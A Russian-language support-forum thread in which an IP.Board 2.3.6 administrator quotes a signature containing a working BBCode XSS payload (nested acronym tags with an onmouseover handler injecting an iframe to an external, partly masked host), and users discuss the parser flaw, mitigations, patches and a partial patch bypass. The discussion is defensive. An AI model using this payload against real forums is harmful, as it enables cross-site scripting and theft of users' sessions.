Перейти к контенту
  • 0

Пытаются взломать что делать


Вопрос

Есть форум ipb 2 3 6

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 100
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0
vasyast, ну, я, допустим, не школота, но на этом форуме есть активная XSS - это очень нехорошо и глупо это отрицать ;)

А я и не отрицаю. Да, дырка. Ну что ж поделать. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0

В общем, решение для тройки - отключите обработку вложенных тегов. Везде где только можно. Обязательно для email, url, font, member, topic, blog, post, acronym, background. Целее будете....

 

Надесь проснуться завтра и увидеть готовые патчи для 3.х и для 2.х :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
у меня на ни на 2,3,6 ни на 3,0,5 не работают эти скрипты... можете написать тут или в личку кинуть код красной таблички из первой страницы темы, хочу проверить у себя.
Ссылка на комментарий
Поделиться на других сайтах

  • 0

rinich, в настройках каждого из BBCode есть опция - "Предотвращать разбор вложенных кодов". Савьте "Да". Только кэш не сбрасывайте, а то уже существующие посты на форуме попортятся :D

 

Так, сводный пост по всему, что мне известно.

 

- дыра известна давно, еще с прошлого года.

- дыра есть и в 2.х, и в 3.х и связана с обработкой вложенных кодов,

- дыра явно активно эксплуатировалась всякими темными личностями и на публику попала случайно,

- в 2.х из-за дыры есть активная XSS (используется в подписях), что грозит вам уводом cookies, сиречь, сессии,

- в 3.х из-за дыры пока удается только попортить разметку страницы, однако, некоторые хакеры пишут о так же рабочей XSS,

- в 2.х проблема, вероятно, решается отключением BBCode в подписях и удалением тега acronym,

- в 3.х следует запретить обработку вложенных тегов для email, url, font, member, topic, blog, post, acronym, background. Возможно, другие теги так же уязвимы - не проверял.

 

Все примеры кода, ссылки на хакерские форумы и примеры использования эксплоитов высланы саппортам IPS и IBR.

 

В целом ничего хорошего.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Коды эксплоитов высланы на support@invisionpower.com и support@ibresource.ru.

Адреса support@ibresource.ru не существует. Если вы нашли этот адрес на одной из страниц клиентцентра, то это лишнее подтверждение того, что ИБР не в состоянии даже там привести всё к актуальному виду. Я говорил об этом ещё пар лет назад.

 

P.S. Напишите на sales@ibresource.ru, хотя уже всё равно.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Хотя бы лупбэк тогда отправляли бы, что нет адреса Оо

 

В клиент-центр запощу коды.

 

Собственно, запостил... Вот только 2:17 8-го марта дают неутешительные прогнозы на исправление.

 

Собственно, вот результат порчи IP.Board 3, уже затертый с IPS админами:

post-75890-1268003985_thumb.png

 

IPS отписались что рассматривают проблему.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Дыра в парсере BBCode.

 

- сменить себе пароль и сбросить ключ авторизации через админцентр;

- удалить BBCode acronym;

- отписать об обнаруженной уязвимости форума в IPS;

- начать думать об обновлении до 3.х (хотя там парсер еще кривее).

 

Первый пункт имеет смысл если сделать это быстро. Иначе вашей сессией уже могли воспользоваться (проверьте логи авторизации в АЦ) и что-нибудь нехорошее сделать.

 

Самый оптимальный вариант. Тэгом acronym мало кто пользуется...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
- удалить BBCode acronym;

Это все, что нужно сделать?

 

это спасет от тега акроним, на античате, хоть там и вобла, нашел тему где один пользователь описал как он взломал античат с помощью использования вложенных тегов url, так что как говорится закрыть можно только текущий баг, но не все лазейки

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо ;)

Я отрубил бб в подписе и в несколько тегах -- Использовать опции в теге? (Используется для создания BB-кода с опциями: [tag=option])

 

И все. Будут попытки вздома до патча, врублю все вновь, но отключу регистрацию на время. :D

 

Исправлено и для 2.3.6, и для 3.0.5. Патчи от IPS будут выложены сегодня.

Надо будет и здесь продублировать. А то ibresource выложить все с большой задержкой. :)

Ссылка на комментарий
Поделиться на других сайтах

  • 0

о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

Ссылка на комментарий
Поделиться на других сайтах

  • 0
Обошел патч на 3.х (рабочую XSS не получил, но HTML снова разрушил). Снова отослал код. Что-то как-то экстенсивным путем идут ребята.... Изменено пользователем Ritsuka
Ссылка на комментарий
Поделиться на других сайтах

  • 0
о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

 

Я правильно понимаю что фиксанули только тег акроним , т.е. если он удален вообще то патч можно и не ставить? или там еще что-то?

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Поправили только style. А вот onmouseover в подписи кажется и не тронули оО

 

Arhar, у меня нигде нет двойки и быстро не поставить :D

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.